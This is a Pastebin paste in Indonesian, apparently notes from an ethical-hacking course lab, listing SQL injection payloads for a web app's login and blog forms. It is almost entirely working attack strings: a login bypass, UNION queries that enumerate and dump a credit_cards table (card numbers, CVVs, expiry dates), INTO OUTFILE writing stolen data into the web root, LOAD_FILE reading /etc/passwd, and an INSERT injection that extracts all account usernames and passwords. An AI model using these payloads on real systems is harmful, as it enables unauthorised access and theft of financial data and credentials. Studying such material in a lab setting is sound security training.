Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Part 1:
- Gambar 1:
- username = admin
- password = admin' or '1' = '1
- Part 2:
- Gambar 2:
- berguna untuk mengetahui jumlah kolom
- username = admin
- password = ' union select count(*),null,null,null,null,null,null from INFORMATION_SCHEMA.COLUMNS where table_name='credit_cards--
- Gambar 3:
- berguna untuk mengetahui nama2 kolom di tabel credit cards
- username = admin
- password = ' union select null,column_name,null,null,null,null,null from INFORMATION_SCHEMA.COLUMNS where table_name='credit_cards
- Gambar 4:
- berguna untuk mengambil data
- username = admin
- password = ' union select ccid,ccnumber,ccv,expiration,null,null,null from credit_cards--
- Gambar 5:
- berguna untuk menyimpan data ke file
- username = admin
- password = ' union select ccid,ccnumber,ccv,expiration,null,null,null from credit_cards into outfile '../../../var/www/html/CEH-WEEK7/halo.txt--
- Part 3:
- Gambar 6:
- berguna untuk membaca file dari
- username = admin
- password = ' union select null, null, LOAD_FILE('../../../etc/passwd'), null,null, null, null--
- Part 4:
- Gambar 7:
- berguna untuk login tanpa username
- username = admin' or '1' = '1'--
- password =
- admin bisa diganti dengan kata apa saja
- Part 5:
- Gambar 8:
- berguna untuk mengambil data saat menginsert blog
- Di form blog = Halo', '2012-12-12 12:12:12'), ('admin', (SELECT GROUP_CONCAT(username, ' ', password) from accounts), '2012-12-12 12:12:12');--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement